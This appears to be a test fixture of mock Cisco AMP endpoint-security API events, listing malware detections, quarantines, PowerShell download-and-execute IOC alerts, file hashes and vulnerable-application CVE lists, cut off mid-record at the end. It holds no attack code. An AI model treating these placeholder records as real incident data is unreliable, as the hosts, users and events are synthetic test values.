+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":695000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":691000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":684000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":682000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960","sha1":"5faebef3bb880489195e80e6656ccf442ff7123b","md5":"84b6f7be5370c1998886214790c6892b"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15152998206589,"timestamp":1610534253,"timestamp_nanoseconds":0,"date":"2021-01-13T10:37:33+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610534253,"start_date":"2021-01-13T10:37:33+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"WINWORD.EXE","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"},"parent":{"disposition":"Clean","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef"}}},"vulnerabilities":[{"name":"Microsoft Office","version":"2013","cve":"CVE-2014-0260","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260"},{"cve":"CVE-2014-1761","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761"},{"cve":"CVE-2014-6357","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357"},{"cve":"CVE-2015-0085","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085"},{"cve":"CVE-2015-0086","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086"},{"cve":"CVE-2015-1641","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641"},{"cve":"CVE-2015-1650","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650"},{"cve":"CVE-2015-1682","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682"},{"cve":"CVE-2015-2379","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379"},{"cve":"CVE-2015-2380","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380"},{"cve":"CVE-2015-2424","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424"},{"cve":"CVE-2016-0127","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127"},{"cve":"CVE-2016-7193","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193"},{"cve":"CVE-2017-0292","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292"},{"cve":"CVE-2017-11826","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826"}]}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508159571352093000,"timestamp":1610533415,"timestamp_nanoseconds":349000000,"date":"2021-01-13T10:23:35+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298360312529000,"timestamp":1610532793,"timestamp_nanoseconds":312509000,"date":"2021-01-13T10:13:13+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610532793,"start_date":"2021-01-13T10:13:13+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298355162029000,"timestamp":1610532788,"timestamp_nanoseconds":162019000,"date":"2021-01-13T10:13:08+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610532788,"start_date":"2021-01-13T10:13:08+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508153524038140000,"timestamp":1610532007,"timestamp_nanoseconds":606000000,"date":"2021-01-13T10:00:07+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6508153524038139905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521062325693667300,"timestamp":1610447087,"timestamp_nanoseconds":693632000,"date":"2021-01-12T10:24:47+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610447087,"start_date":"2021-01-12T10:24:47+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6532910514396201000,"timestamp":1610446522,"timestamp_nanoseconds":872000000,"date":"2021-01-12T10:15:22+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:Malwaregen.21do.1201","detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"OLD.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\OLD.exe","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9","sha1":"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c","md5":"cfdd16225e67471f5ef54cab9b3a5558"},"parent":{"process_id":2632,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef","sha1":"84123a3decdaa217e3588a1de59fe6cee1998004","md5":"38ae1b3c38faef56fe4907922f0385ba"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Auto.F2863A.211556.in02","detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"twhy.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Roaming\\twhy.exe","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117","sha1":"7d9518ea3f98d037745352b23861fab05d3777dc","md5":"c624d61b8f076c3ef05f74eeb96c8954"},"parent":{"process_id":4868,"disposition":"Clean","file_name":"powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7","sha1":"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d","md5":"92f44e405db16ac55d97e3bfe3b132fa"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132516139000,"timestamp":1608874241,"timestamp_nanoseconds":516130000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132474871000,"timestamp":1608874241,"timestamp_nanoseconds":474861000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384389977,"timestamp":1608872547,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:27+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872547,"start_date":"2020-12-25T05:02:27+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384371995,"timestamp":1608872546,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:26+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872546,"start_date":"2020-12-25T05:02:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193366641599,"timestamp":1608870773,"timestamp_nanoseconds":0,"date":"2020-12-25T04:32:53+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608870773,"start_date":"2020-12-25T04:32:53+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"OUTLOOK.EXE","identity":{"sha256":"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc"},"parent":{"disposition":"Clean","identity":{"sha256":"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243"}}},"vulnerabilities":[{"name":"Microsoft 